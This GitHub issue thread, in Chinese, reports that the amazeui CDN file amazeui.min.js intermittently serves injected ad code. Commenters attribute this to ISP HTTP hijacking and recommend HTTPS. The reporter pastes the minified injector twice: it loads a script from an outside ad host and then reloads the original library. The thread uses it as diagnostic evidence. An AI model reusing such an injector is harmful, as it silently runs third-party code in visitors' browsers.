### ISSUE TITLE
Amazeui 官方CDN中疑是携带广告

### ISSUE THREAD

**Issue by shiqinghe** [amazeui/amazeui#992]
如题，http://cdn.amazeui.org/amazeui/2.7.2/js/amazeui.min.js，
该CDN中一段时间正常，一段时间携带恶意广告代码，希望是网络劫持或是别的原因而非蓄意而为之。
在之前的使用过程中，加载了数十个外部js，广告无比霸气
该CDN在有广告时的返回内容是：
`(function(){try{var e="_|_",t=document,r="http://cdn.amazeui.org/amazeui/2.7.2/js/amazeui.min.js",c="http://shama5.com/?tsliese=27312832",n=r+(~r.indexOf("?")?"&":"?")+(new Date).getTime(),i=t.currentScript,s=t.getElementsByTagName("head")[0],a=function(e,r){var c=t.createElement("script");c.type="text/javascript",r&&(c.id=r),c.src=e,s.appendChild(c)};t.getElementById(e)||self==top&&a(c,e),i||(i=function(){for(var e=t.scripts,c=e.length,n=0;n<c;++n)if(e[n].src===r)return e[n]}()),i&&(i.defer||i.async?a(n):t.write('<script src="'+n+'"></script>'))}catch(e){}})();`

**Comment by shiqinghe** [comment]
有广告的CDN返回如下：
`(function(){try{var e="_|_",t=document,r="http://cdn.amazeui.org/amazeui/2.7.2/js/amazeui.min.js",c="http://shama5.com/?tsliese=27312832",n=r+(~r.indexOf("?")?"&":"?")+(new Date).getTime(),i=t.currentScript,s=t.getElementsByTagName("head")[0],a=function(e,r){var c=t.createElement("script");c.type="text/javascript",r&&(c.id=r),c.src=e,s.appendChild(c)};t.getElementById(e)||self==top&&a(c,e),i||(i=function(){for(var e=t.scripts,c=e.length,n=0;n<c;++n)if(e[n].src===r)return e[n]}()),i&&(i.defer||i.async?a(n):t.write('<script src="'+n+'"></script>'))}catch(e){}})();`

**Comment by minwe** [comment]
可能是运营商劫持吧，CDN 用的七牛，应该不至于这么搞。

**Comment by qixiaobo** [comment]
论https的重要性……
http://qixiaobo.site/2017/04/25/ISP%E5%8A%AB%E6%8C%81http%E8%AF%B7%E6%B1%82/

**Comment by lwxyfer** [comment]
请直接投诉运营商。也可以自己上 HTTPS。
